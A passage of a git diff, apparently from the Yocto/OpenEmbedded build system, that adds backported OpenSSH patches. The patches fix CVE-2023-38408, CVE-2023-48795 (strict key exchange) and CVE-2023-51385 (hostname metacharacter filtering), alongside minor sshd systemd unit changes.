++		fatal("%s: sshbuf_new", __func__);
++	if ((r = sshbuf_putb(e->session_ids[i].sid, sid)) != 0)
++		fatal("%s: sshbuf_putb session ID: %s", __func__, ssh_err(r));
++	/* success */
++	r = 0;
++ out:
++	sshkey_free(key);
++	sshbuf_free(sid);
++	sshbuf_free(sig);
++	return r == 0 ? 1 : 0;
++}
++
++static void
++process_extension(SocketEntry *e)
++{
++	int r, success = 0;
++	char *name;
++
++	debug2("%s: entering", __func__);
++	if ((r = sshbuf_get_cstring(e->request, &name, NULL)) != 0) {
++		error("%s: parse: %s", __func__, ssh_err(r));
++		goto send;
++	}
++	if (strcmp(name, "session-bind@openssh.com") == 0)
++		success = process_ext_session_bind(e);
++	else
++		debug("%s: unsupported extension \"%s\"", __func__, name);
++send:
++	send_status(e, success);
++}
+ /*
+  * dispatch incoming message.
+  * returns 1 on success, 0 for incomplete messages or -1 on error.
+@@ -1019,6 +1175,9 @@ process_message(u_int socknum)
+		process_remove_smartcard_key(e);
+		break;
+ #endif /* ENABLE_PKCS11 */
++	case SSH_AGENTC_EXTENSION:
++		process_extension(e);
++		break;
+	default:
+		/* Unknown message.  Respond with failure. */
+		error("Unknown message %d", type);
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch
new file mode 100644
index 0000000000..934775bdec
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch
@@ -0,0 +1,120 @@
+From 4fe3d0fbd3d6dc1f19354e0d73a3231c461ed044 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 13:56:33 +0000
+Subject: [PATCH 12/12] upstream: Disallow remote addition of FIDO/PKCS11
+ provider libraries to ssh-agent by default.
+
+The old behaviour of allowing remote clients from loading providers
+can be restored using `ssh-agent -O allow-remote-pkcs11`.
+
+Detection of local/remote clients requires a ssh(1) that supports
+the `session-bind@openssh.com` extension. Forwarding access to a
+ssh-agent socket using non-OpenSSH tools may circumvent this control.
+
+ok markus@
+
+OpenBSD-Commit-ID: 4c2bdf79b214ae7e60cc8c39a45501344fa7bd7c
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1f2731f5d7a8f8a8385c6031667ed29072c0d92a]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.1 | 20 ++++++++++++++++++++
+ ssh-agent.c | 26 ++++++++++++++++++++++++--
+ 2 files changed, 44 insertions(+), 2 deletions(-)
+
+diff --git a/ssh-agent.1 b/ssh-agent.1
+index fff0db6..a0f1e21 100644
+--- a/ssh-agent.1
++++ b/ssh-agent.1
+@@ -97,6 +97,26 @@ The default is
+ Kill the current agent (given by the
+ .Ev SSH_AGENT_PID
+ environment variable).
++Currently two options are supported:
++.Cm allow-remote-pkcs11
++and
++.Pp
++The
++.Cm allow-remote-pkcs11
++option allows clients of a forwarded
++.Nm
++to load PKCS#11 or FIDO provider libraries.
++By default only local clients may perform this operation.
++Note that signalling that a
++.Nm
++client remote is performed by
++.Xr ssh 1 ,
++and use of other tools to forward access to the agent socket may circumvent
++this restriction.
++.Pp
++The
++.Cm no-restrict-websafe ,
++instructs
+ .It Fl P Ar provider_whitelist
+ Specify a pattern-list of acceptable paths for PKCS#11 and FIDO authenticator
+ shared libraries that may be used with the
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 01c7f2b..40c1b6b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.280 2021/12/19 22:09:23 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.300 2023/07/19 13:56:33 djm Exp $ */
+ /*
+  * Author: Tatu Ylonen <ylo@cs.hut.fi>
+  * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -167,6 +167,12 @@ char socket_dir[PATH_MAX];
+ /* PKCS#11/Security key path whitelist */
+ static char *provider_whitelist;
+
++/*
++ * Allows PKCS11 providers or SK keys that use non-internal providers to
++ * be added over a remote connection (identified by session-bind@openssh.com).
++ */
++static int remote_add_provider;
++
+ /* locking */
+ #define LOCK_SIZE	32
+ #define LOCK_SALT_SIZE	16
+@@ -736,6 +742,15 @@ process_add_identity(SocketEntry *e)
+		if (strcasecmp(sk_provider, "internal") == 0) {
+			debug("%s: internal provider", __func__);
+		} else {
++			if (e->nsession_ids != 0 && !remote_add_provider) {
++				verbose("failed add of SK provider \"%.100s\": "
++				    "remote addition of providers is disabled",
++				    sk_provider);
++				free(sk_provider);
++				free(comment);
++				sshkey_free(k);
++				goto send;
++			}
+			if (realpath(sk_provider, canonical_provider) == NULL) {
+				verbose("failed provider \"%.100s\": "
+				    "realpath: %s", sk_provider,
+@@ -901,6 +916,11 @@ process_add_smartcard_key(SocketEntry *e)
+			goto send;
+		}
+	}
++	if (e->nsession_ids != 0 && !remote_add_provider) {
++		verbose("failed PKCS#11 add of \"%.100s\": remote addition of "
++		    "providers is disabled", provider);
++		goto send;
++	}
+	if (realpath(provider, canonical_provider) == NULL) {
+		verbose("failed PKCS#11 add of \"%.100s\": realpath: %s",
+		    provider, strerror(errno));
+@@ -1556,7 +1576,9 @@ main(int ac, char **av)
+			break;
+		case 'O':
+			if (strcmp(optarg, "no-restrict-websafe") == 0)
+-				restrict_websafe  = 0;
++				restrict_websafe = 0;
++			else if (strcmp(optarg, "allow-remote-pkcs11") == 0)
++				remote_add_provider = 1;
+			else
+				fatal("Unknown -O option");
+			break;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch
new file mode 100644
index 0000000000..57c45e3d93
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch
@@ -0,0 +1,468 @@
+(modified to not remove ssh_packet_read_expect(), to add to
+KexAlgorithms in sshd.c and sshconnect2.c as this version pre-dates
+kex_proposal_populate_entries(), replace debug*_f() with debug*(),
+error*_f() with error*(), and fatal_f() with fatal())
+
+Backport of:
+
+From 1edb00c58f8a6875fad6a497aa2bacf37f9e6cd5 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Mon, 18 Dec 2023 14:45:17 +0000
+Subject: [PATCH] upstream: implement "strict key exchange" in ssh and sshd
+
+This adds a protocol extension to improve the integrity of the SSH
+transport protocol, particular in and around the initial key exchange
+(KEX) phase.
+
+Full details of the extension are in the PROTOCOL file.
+
+with markus@
+
+OpenBSD-Commit-ID: 2a66ac962f0a630d7945fee54004ed9e9c439f14
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/openssh/tree/debian/patches/CVE-2023-48795.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/openssh/openssh-portable/commit/1edb00c58f8a6875fad6a497aa2bacf37f9e6cd5]
+CVE: CVE-2023-48795
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ PROTOCOL      | 26 +++++++++++++++++
+ kex.c         | 68 +++++++++++++++++++++++++++++++++-----------
+ kex.h         |  1 +
+ packet.c      | 78 ++++++++++++++++++++++++++++++++++++++-------------
+ sshconnect2.c | 14 +++------
+ sshd.c        |  7 +++--
+ 6 files changed, 146 insertions(+), 48 deletions(-)
+
+diff --git a/PROTOCOL b/PROTOCOL
+index f75c1c0..89bddfe 100644
+--- a/PROTOCOL
++++ b/PROTOCOL
+@@ -102,6 +102,32 @@ OpenSSH supports the use of ECDH in Curve25519 for key exchange as
+ described at:
+ http://git.libssh.org/users/aris/libssh.git/plain/doc/curve25519-sha256@libssh.org.txt?h=curve25519
+ 
++1.9 transport: strict key exchange extension
++
++OpenSSH supports a number of transport-layer hardening measures under
++a "strict KEX" feature. This feature is signalled similarly to the
++RFC8308 ext-info feature: by including a additional algorithm in the
++initiial SSH2_MSG_KEXINIT kex_algorithms field. The client may append
++"kex-strict-c-v00@openssh.com" to its kex_algorithms and the server
++may append "kex-strict-s-v00@openssh.com". These pseudo-algorithms
++are only valid in the initial SSH2_MSG_KEXINIT and MUST be ignored
++if they are present in subsequent SSH2_MSG_KEXINIT packets.
++
++When an endpoint that supports this extension observes this algorithm
++name in a peer's KEXINIT packet, it MUST make the following changes to
++the the protocol:
++
++a) During initial KEX, terminate the connection if any unexpected or
++   out-of-sequence packet is received. This includes terminating the
++   connection if the first packet received is not SSH2_MSG_KEXINIT.
++   Unexpected packets for the purpose of strict KEX include messages
++   that are otherwise valid at any time during the connection such as
++   SSH2_MSG_DEBUG and SSH2_MSG_IGNORE.
++b) After sending or receiving a SSH2_MSG_NEWKEYS message, reset the
++   packet sequence number to zero. This behaviour persists for the
++   duration of the connection (i.e. not just the first
++   SSH2_MSG_NEWKEYS).
++
+ 2. Connection protocol changes
+ 
+ 2.1. connection: Channel write close extension "eow@openssh.com"
+diff --git a/kex.c b/kex.c
+index ce85f04..3129a4e 100644
+--- a/kex.c
++++ b/kex.c
+@@ -63,7 +63,7 @@
+ #include "digest.h"
+ 
+ /* prototype */
+-static int kex_choose_conf(struct ssh *);
++static int kex_choose_conf(struct ssh *, uint32_t seq);
+ static int kex_input_newkeys(int, u_int32_t, struct ssh *);
+ 
+ static const char *proposal_names[PROPOSAL_MAX] = {
+@@ -173,6 +173,18 @@ kex_names_valid(const char *names)
+ 	return 1;
+ }
+ 
++/* returns non-zero if proposal contains any algorithm from algs */
++static int
++has_any_alg(const char *proposal, const char *algs)
++{
++	char *cp;
++
++	if ((cp = match_list(proposal, algs, NULL)) == NULL)
++		return 0;
++	free(cp);
++	return 1;
++}
++
+ /*
+  * Concatenate algorithm names, avoiding duplicates in the process.
+  * Caller must free returned string.
+@@ -180,7 +192,7 @@ kex_names_valid(const char *names)
+ char *
+ kex_names_cat(const char *a, const char *b)
+ {
+-	char *ret = NULL, *tmp = NULL, *cp, *p, *m;
++	char *ret = NULL, *tmp = NULL, *cp, *p;
+ 	size_t len;
+ 
+ 	if (a == NULL || *a == '\0')
+@@ -197,10 +209,8 @@ kex_names_cat(const char *a, const char *b)
+ 	}
+ 	strlcpy(ret, a, len);
+ 	for ((p = strsep(&cp, ",")); p && *p != '\0'; (p = strsep(&cp, ","))) {
+-		if ((m = match_list(ret, p, NULL)) != NULL) {
+-			free(m);
++		if (has_any_alg(ret, p))
+ 			continue; /* Algorithm already present */
+-		}
+ 		if (strlcat(ret, ",", len) >= len ||
+ 		    strlcat(ret, p, len) >= len) {
+ 			free(tmp);
+@@ -409,7 +419,12 @@ kex_protocol_error(int type, u_int32_t seq, struct ssh *ssh)
+ {
+ 	int r;
+ 
+-	error("kex protocol error: type %d seq %u", type, seq);
++	/* If in strict mode, any unexpected message is an error */
++	if ((ssh->kex->flags & KEX_INITIAL) && ssh->kex->kex_strict) {
++		ssh_packet_disconnect(ssh, "strict KEX violation: "
++		    "unexpected packet type %u (seqnr %u)", type, seq);
++	}
++	error("type %u seq %u", type, seq);
+ 	if ((r = sshpkt_start(ssh, SSH2_MSG_UNIMPLEMENTED)) != 0 ||
+ 	    (r = sshpkt_put_u32(ssh, seq)) != 0 ||
+ 	    (r = sshpkt_send(ssh)) != 0)
+@@ -481,6 +496,11 @@ kex_input_ext_info(int type, u_int32_t seq, struct ssh *ssh)
+ 	ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, &kex_protocol_error);
+ 	if ((r = sshpkt_get_u32(ssh, &ninfo)) != 0)
+ 		return r;
++	if (ninfo >= 1024) {
++		error("SSH2_MSG_EXT_INFO with too many entries, expected "
++		    "<=1024, received %u", ninfo);
++		return dispatch_protocol_error(type, seq, ssh);
++	}
+ 	for (i = 0; i < ninfo; i++) {
+ 		if ((r = sshpkt_get_cstring(ssh, &name, NULL)) != 0)
+ 			return r;
+@@ -581,7 +601,7 @@ kex_input_kexinit(int type, u_int32_t seq, struct ssh *ssh)
+ 		error("%s: no hex", __func__);
+ 		return SSH_ERR_INTERNAL_ERROR;
+ 	}
+-	ssh_dispatch_set(ssh, SSH2_MSG_KEXINIT, NULL);
++	ssh_dispatch_set(ssh, SSH2_MSG_KEXINIT, &kex_protocol_error);
+ 	ptr = sshpkt_ptr(ssh, &dlen);
+ 	if ((r = sshbuf_put(kex->peer, ptr, dlen)) != 0)
+ 		return r;
+@@ -617,7 +637,7 @@ kex_input_kexinit(int type, u_int32_t seq, struct ssh *ssh)
+ 	if (!(kex->flags & KEX_INIT_SENT))
+ 		if ((r = kex_send_kexinit(ssh)) != 0)
+ 			return r;
+-	if ((r = kex_choose_conf(ssh)) != 0)
++	if ((r = kex_choose_conf(ssh, seq)) != 0)
+ 		return r;
+ 
+ 	if (kex->kex_type < KEX_MAX && kex->kex[kex->kex_type] != NULL)
+@@ -880,7 +900,13 @@ proposals_match(char *my[PROPOSAL_MAX], char *peer[PROPOSAL_MAX])
+ }
+ 
+ static int
+-kex_choose_conf(struct ssh *ssh)
++kexalgs_contains(char **peer, const char *ext)
++{
++	return has_any_alg(peer[PROPOSAL_KEX_ALGS], ext);
++}
++
++static int
++kex_choose_conf(struct ssh *ssh, uint32_t seq)
+ {
+ 	struct kex *kex = ssh->kex;
+ 	struct newkeys *newkeys;
+@@ -905,13 +931,23 @@ kex_choose_conf(struct ssh *ssh)
+ 		sprop=peer;
+ 	}
+ 
+-	/* Check whether client supports ext_info_c */
+-	if (kex->server && (kex->flags & KEX_INITIAL)) {
+-		char *ext;
+-
+-		ext = match_list("ext-info-c", peer[PROPOSAL_KEX_ALGS], NULL);
+-		kex->ext_info_c = (ext != NULL);
+-		free(ext);
++	/* Check whether peer supports ext_info/kex_strict */
++	if ((kex->flags & KEX_INITIAL) != 0) {
++		if (kex->server) {
++			kex->ext_info_c = kexalgs_contains(peer, "ext-info-c");
++			kex->kex_strict = kexalgs_contains(peer,
++			    "kex-strict-c-v00@openssh.com");
++		} else {
++			kex->kex_strict = kexalgs_contains(peer,
++			    "kex-strict-s-v00@openssh.com");
++		}
++		if (kex->kex_strict) {
++			debug3("will use strict KEX ordering");
++			if (seq != 0)
++				ssh_packet_disconnect(ssh,
++				    "strict KEX violation: "
++				    "KEXINIT was not the first packet");
++		}
+ 	}
+ 
+ 	/* Algorithm Negotiation */
+diff --git a/kex.h b/kex.h
+index a5ae6ac..cae38f7 100644
+--- a/kex.h
++++ b/kex.h
+@@ -145,6 +145,7 @@ struct kex {
+ 	u_int	kex_type;
+ 	char	*server_sig_algs;
+ 	int	ext_info_c;
++	int	kex_strict;
+ 	struct sshbuf *my;
+ 	struct sshbuf *peer;
+ 	struct sshbuf *client_version;
+diff --git a/packet.c b/packet.c
+index 6d3e917..43139f9 100644
+--- a/packet.c
++++ b/packet.c
+@@ -1203,8 +1203,13 @@ ssh_packet_send2_wrapped(struct ssh *ssh)
+ 	sshbuf_dump(state->output, stderr);
+ #endif
+ 	/* increment sequence number for outgoing packets */
+-	if (++state->p_send.seqnr == 0)
++	if (++state->p_send.seqnr == 0) {
++		if ((ssh->kex->flags & KEX_INITIAL) != 0) {
++			ssh_packet_disconnect(ssh, "outgoing sequence number "
++			    "wrapped during initial key exchange");
++		}
+ 		logit("outgoing seqnr wraps around");
++	}
+ 	if (++state->p_send.packets == 0)
+ 		if (!(ssh->compat & SSH_BUG_NOREKEY))
+ 			return SSH_ERR_NEED_REKEY;
+@@ -1212,6 +1217,11 @@ ssh_packet_send2_wrapped(struct ssh *ssh)
+ 	state->p_send.bytes += len;
+ 	sshbuf_reset(state->outgoing_packet);
+ 
++	if (type == SSH2_MSG_NEWKEYS && ssh->kex->kex_strict) {
++		debug("resetting send seqnr %u", state->p_send.seqnr);
++		state->p_send.seqnr = 0;
++	}
++
+ 	if (type == SSH2_MSG_NEWKEYS)
+ 		r = ssh_set_newkeys(ssh, MODE_OUT);
+ 	else if (type == SSH2_MSG_USERAUTH_SUCCESS && state->server_side)
+@@ -1345,8 +1355,7 @@ ssh_packet_read_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ 	/* Stay in the loop until we have received a complete packet. */
+ 	for (;;) {
+ 		/* Try to read a packet from the buffer. */
+-		r = ssh_packet_read_poll_seqnr(ssh, typep, seqnr_p);
+-		if (r != 0)
++		if ((r = ssh_packet_read_poll_seqnr(ssh, typep, seqnr_p)) != 0)
+ 			break;
+ 		/* If we got a packet, return it. */
+ 		if (*typep != SSH_MSG_NONE)
+@@ -1633,10 +1642,16 @@ ssh_packet_read_poll2(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ 		if ((r = sshbuf_consume(state->input, mac->mac_len)) != 0)
+ 			goto out;
+ 	}
++
+ 	if (seqnr_p != NULL)
+ 		*seqnr_p = state->p_read.seqnr;
+-	if (++state->p_read.seqnr == 0)
++	if (++state->p_read.seqnr == 0) {
++		if ((ssh->kex->flags & KEX_INITIAL) != 0) {
++			ssh_packet_disconnect(ssh, "incoming sequence number "
++			    "wrapped during initial key exchange");
++		}
+ 		logit("incoming seqnr wraps around");
++	}
+ 	if (++state->p_read.packets == 0)
+ 		if (!(ssh->compat & SSH_BUG_NOREKEY))
+ 			return SSH_ERR_NEED_REKEY;
+@@ -1702,6 +1717,10 @@ ssh_packet_read_poll2(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ #endif
+ 	/* reset for next packet */
+ 	state->packlen = 0;
++	if (*typep == SSH2_MSG_NEWKEYS && ssh->kex->kex_strict) {
++		debug("resetting read seqnr %u", state->p_read.seqnr);
++		state->p_read.seqnr = 0;
++	}
+ 
+ 	/* do we need to rekey? */
+ 	if (ssh_packet_need_rekeying(ssh, 0)) {
+@@ -1726,10 +1745,39 @@ ssh_packet_read_poll_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ 		r = ssh_packet_read_poll2(ssh, typep, seqnr_p);
+ 		if (r != 0)
+ 			return r;
+-		if (*typep) {
+-			state->keep_alive_timeouts = 0;
+-			DBG(debug("received packet type %d", *typep));
++		if (*typep == 0) {
++			/* no message ready */
++			return 0;
++		}
++		state->keep_alive_timeouts = 0;
++		DBG(debug("received packet type %d", *typep));
++
++		/* Always process disconnect messages */
++		if (*typep == SSH2_MSG_DISCONNECT) {
++			if ((r = sshpkt_get_u32(ssh, &reason)) != 0 ||
++			    (r = sshpkt_get_string(ssh, &msg, NULL)) != 0)
++				return r;
++			/* Ignore normal client exit notifications */
++			do_log2(ssh->state->server_side &&
++			    reason == SSH2_DISCONNECT_BY_APPLICATION ?
++			    SYSLOG_LEVEL_INFO : SYSLOG_LEVEL_ERROR,
++			    "Received disconnect from %s port %d:"
++			    "%u: %.400s", ssh_remote_ipaddr(ssh),
++			    ssh_remote_port(ssh), reason, msg);
++			free(msg);
++			return SSH_ERR_DISCONNECTED;
+ 		}
++
++		/*
++		 * Do not implicitly handle any messages here during initial
++		 * KEX when in strict mode. They will be need to be allowed
++		 * explicitly by the KEX dispatch table or they will generate
++		 * protocol errors.
++		 */
++		if (ssh->kex != NULL &&
++		    (ssh->kex->flags & KEX_INITIAL) && ssh->kex->kex_strict)
++			return 0;
++		/* Implicitly handle transport-level messages */
+ 		switch (*typep) {
+ 		case SSH2_MSG_IGNORE:
+ 			debug3("Received SSH2_MSG_IGNORE");
+@@ -1744,19 +1792,6 @@ ssh_packet_read_poll_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ 			debug("Remote: %.900s", msg);
+ 			free(msg);
+ 			break;
+-		case SSH2_MSG_DISCONNECT:
+-			if ((r = sshpkt_get_u32(ssh, &reason)) != 0 ||
+-			    (r = sshpkt_get_string(ssh, &msg, NULL)) != 0)
+-				return r;
+-			/* Ignore normal client exit notifications */
+-			do_log2(ssh->state->server_side &&
+-			    reason == SSH2_DISCONNECT_BY_APPLICATION ?
+-			    SYSLOG_LEVEL_INFO : SYSLOG_LEVEL_ERROR,
+-			    "Received disconnect from %s port %d:"
+-			    "%u: %.400s", ssh_remote_ipaddr(ssh),
+-			    ssh_remote_port(ssh), reason, msg);
+-			free(msg);
+-			return SSH_ERR_DISCONNECTED;
+ 		case SSH2_MSG_UNIMPLEMENTED:
+ 			if ((r = sshpkt_get_u32(ssh, &seqnr)) != 0)
+ 				return r;
+@@ -2235,6 +2270,7 @@ kex_to_blob(struct sshbuf *m, struct kex *kex)
+ 	    (r = sshbuf_put_u32(m, kex->hostkey_type)) != 0 ||
+ 	    (r = sshbuf_put_u32(m, kex->hostkey_nid)) != 0 ||
+ 	    (r = sshbuf_put_u32(m, kex->kex_type)) != 0 ||
++	    (r = sshbuf_put_u32(m, kex->kex_strict)) != 0 ||
+ 	    (r = sshbuf_put_stringb(m, kex->my)) != 0 ||
+ 	    (r = sshbuf_put_stringb(m, kex->peer)) != 0 ||
+ 	    (r = sshbuf_put_stringb(m, kex->client_version)) != 0 ||
+@@ -2397,6 +2433,7 @@ kex_from_blob(struct sshbuf *m, struct kex **kexp)
+ 	    (r = sshbuf_get_u32(m, (u_int *)&kex->hostkey_type)) != 0 ||
+ 	    (r = sshbuf_get_u32(m, (u_int *)&kex->hostkey_nid)) != 0 ||
+ 	    (r = sshbuf_get_u32(m, &kex->kex_type)) != 0 ||
++	    (r = sshbuf_get_u32(m, &kex->kex_strict)) != 0 ||
+ 	    (r = sshbuf_get_stringb(m, kex->my)) != 0 ||
+ 	    (r = sshbuf_get_stringb(m, kex->peer)) != 0 ||
+ 	    (r = sshbuf_get_stringb(m, kex->client_version)) != 0 ||
+@@ -2724,6 +2761,7 @@ sshpkt_disconnect(struct ssh *ssh, const char *fmt,...)
+ 	vsnprintf(buf, sizeof(buf), fmt, args);
+ 	va_end(args);
+ 
++	debug2("sending SSH2_MSG_DISCONNECT: %s", buf);
+ 	if ((r = sshpkt_start(ssh, SSH2_MSG_DISCONNECT)) != 0 ||
+ 	    (r = sshpkt_put_u32(ssh, SSH2_DISCONNECT_PROTOCOL_ERROR)) != 0 ||
+ 	    (r = sshpkt_put_cstring(ssh, buf)) != 0 ||
+diff --git a/sshconnect2.c b/sshconnect2.c
+index 5df9477..617ed9f 100644
+--- a/sshconnect2.c
++++ b/sshconnect2.c
+@@ -218,7 +218,8 @@ ssh_kex2(struct ssh *ssh, char *host, struct sockaddr *hostaddr, u_short port)
+ 		fatal("%s: kex_assemble_namelist", __func__);
+ 	free(all_key);
+ 
+-	if ((s = kex_names_cat(options.kex_algorithms, "ext-info-c")) == NULL)
++	if ((s = kex_names_cat(options.kex_algorithms,
++	    "ext-info-c,kex-strict-c-v00@openssh.com")) == NULL)
+ 		fatal("%s: kex_names_cat", __func__);
+ 	myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(s);
+ 	myproposal[PROPOSAL_ENC_ALGS_CTOS] =
+@@ -343,7 +344,6 @@ struct cauthmethod {
+ };
+ 
+ static int input_userauth_service_accept(int, u_int32_t, struct ssh *);
+-static int input_userauth_ext_info(int, u_int32_t, struct ssh *);
+ static int input_userauth_success(int, u_int32_t, struct ssh *);
+ static int input_userauth_failure(int, u_int32_t, struct ssh *);
+ static int input_userauth_banner(int, u_int32_t, struct ssh *);
+@@ -460,7 +460,7 @@ ssh_userauth2(struct ssh *ssh, const char *local_user,
+ 
+ 	ssh->authctxt = &authctxt;
+ 	ssh_dispatch_init(ssh, &input_userauth_error);
+-	ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, &input_userauth_ext_info);
++	ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, kex_input_ext_info);
+ 	ssh_dispatch_set(ssh, SSH2_MSG_SERVICE_ACCEPT, &input_userauth_service_accept);
+ 	ssh_dispatch_run_fatal(ssh, DISPATCH_BLOCK, &authctxt.success);	/* loop until success */
+ 	pubkey_cleanup(ssh);
+@@ -505,13 +505,6 @@ input_userauth_service_accept(int type, u_int32_t seq, struct ssh *ssh)
+ 	return r;
+ }
+ 
+-/* ARGSUSED */
+-static int
+-input_userauth_ext_info(int type, u_int32_t seqnr, struct ssh *ssh)
+-{
+-	return kex_input_ext_info(type, seqnr, ssh);
+-}
+-
+ void
+ userauth(struct ssh *ssh, char *authlist)
+ {
+@@ -593,6 +586,7 @@ input_userauth_success(int type, u_int32_t seq, struct ssh *ssh)
+ 	free(authctxt->methoddata);
+ 	authctxt->methoddata = NULL;
+ 	authctxt->success = 1;			/* break out */
++	ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, dispatch_protocol_error);
+ 	return 0;
+ }
+ 
+diff --git a/sshd.c b/sshd.c
+index 60b2aaf..ffea38c 100644
+--- a/sshd.c
++++ b/sshd.c
+@@ -2323,11 +2323,13 @@ static void
+ do_ssh2_kex(struct ssh *ssh)
+ {
+ 	char *myproposal[PROPOSAL_MAX] = { KEX_SERVER };
++	char *s;
+ 	struct kex *kex;
+ 	int r;
+ 
+-	myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(
+-	    options.kex_algorithms);
++	if ((s = kex_names_cat(options.kex_algorithms, "kex-strict-s-v00@openssh.com")) == NULL)
++		fatal("kex_names_cat");
++	myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(s);
+ 	myproposal[PROPOSAL_ENC_ALGS_CTOS] = compat_cipher_proposal(
+ 	    options.ciphers);
+ 	myproposal[PROPOSAL_ENC_ALGS_STOC] = compat_cipher_proposal(
+@@ -2382,6 +2384,7 @@ do_ssh2_kex(struct ssh *ssh)
+ 	packet_send();
+ 	packet_write_wait();
+ #endif
++	free(s);
+ 	debug("KEX done");
+ }
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch
new file mode 100644
index 0000000000..0ba8c312d0
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch
@@ -0,0 +1,95 @@
+From 7ef3787c84b6b524501211b11a26c742f829af1a Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Mon, 18 Dec 2023 14:47:44 +0000
+Subject: [PATCH] upstream: ban user/hostnames with most shell metacharacters
+
+This makes ssh(1) refuse user or host names provided on the
+commandline that contain most shell metacharacters.
+
+Some programs that invoke ssh(1) using untrusted data do not filter
+metacharacters in arguments they supply. This could create
+interactions with user-specified ProxyCommand and other directives
+that allow shell injection attacks to occur.
+
+It's a mistake to invoke ssh(1) with arbitrary untrusted arguments,
+but getting this stuff right can be tricky, so this should prevent
+most obvious ways of creating risky situations. It however is not
+and cannot be perfect: ssh(1) has no practical way of interpreting
+what shell quoting rules are in use and how they interact with the
+user's specified ProxyCommand.
+
+To allow configurations that use strange user or hostnames to
+continue to work, this strictness is applied only to names coming
+from the commandline. Names specified using User or Hostname
+directives in ssh_config(5) are not affected.
+
+feedback/ok millert@ markus@ dtucker@ deraadt@
+
+OpenBSD-Commit-ID: 3b487348b5964f3e77b6b4d3da4c3b439e94b2d9
+
+CVE: CVE-2023-51385
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/7ef3787c84b6b524501211b11a26c742f829af1a]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: Hunks refreshed to apply cleanly
+
+---
+ ssh.c | 41 ++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 40 insertions(+), 1 deletion(-)
+
+diff --git a/ssh.c b/ssh.c
+index 35c48e62d18..48d93ddf2a9 100644
+--- a/ssh.c
++++ b/ssh.c
+@@ -583,6 +583,41 @@ set_addrinfo_port(struct addrinfo *addrs
+ 	}
+ }
+ 
++static int
++valid_hostname(const char *s)
++{
++	size_t i;
++
++	if (*s == '-')
++		return 0;
++	for (i = 0; s[i] != 0; i++) {
++		if (strchr("'`\"$\\;&<>|(){}", s[i]) != NULL ||
++		    isspace((u_char)s[i]) || iscntrl((u_char)s[i]))
++			return 0;
++	}
++	return 1;
++}
++
++static int
++valid_ruser(const char *s)
++{
++	size_t i;
++
++	if (*s == '-')
++		return 0;
++	for (i = 0; s[i] != 0; i++) {
++		if (strchr("'`\";&<>|(){}", s[i]) != NULL)
++			return 0;
++		/* Disallow '-' after whitespace */
++		if (isspace((u_char)s[i]) && s[i + 1] == '-')
++			return 0;
++		/* Disallow \ in last position */
++		if (s[i] == '\\' && s[i + 1] == '\0')
++			return 0;
++	}
++	return 1;
++}
++
+ /*
+  * Main program for the ssh client.
+  */
+@@ -1069,6 +1104,10 @@ main(int ac, char **av)
+ 	if (!host)
+ 		usage();
+ 
++	if (!valid_hostname(host))
++		fatal("hostname contains invalid characters");
++	if (options.user != NULL && !valid_ruser(options.user))
++		fatal("remote username contains invalid characters");
+ 	host_arg = xstrdup(host);
+ 
+ 	/* Initialize the command to execute on remote host. */
diff --git a/meta/recipes-connectivity/openssh/openssh/sshd.socket b/meta/recipes-connectivity/openssh/openssh/sshd.socket
index 12c39b26b5..8d76d62309 100644
--- a/meta/recipes-connectivity/openssh/openssh/sshd.socket
+++ b/meta/recipes-connectivity/openssh/openssh/sshd.socket
@@ -1,5 +1,6 @@
 [Unit]
 Conflicts=sshd.service
+Wants=sshdgenkeys.service
 
 [Socket]
 ExecStartPre=@BASE_BINDIR@/mkdir -p /var/run/sshd
diff --git a/meta/recipes-connectivity/openssh/openssh/sshd@.service b/meta/recipes-connectivity/openssh/openssh/sshd@.service
index 9d83dfb2bb..422450c7a1 100644
--- a/meta/recipes-connectivity/openssh/openssh/sshd@.service
+++ b/meta/recipes-connectivity/openssh/openssh/sshd@.service
@@ -1,13 +1,11 @@
 [Unit]
 Description=OpenSSH Per-Connection Daemon
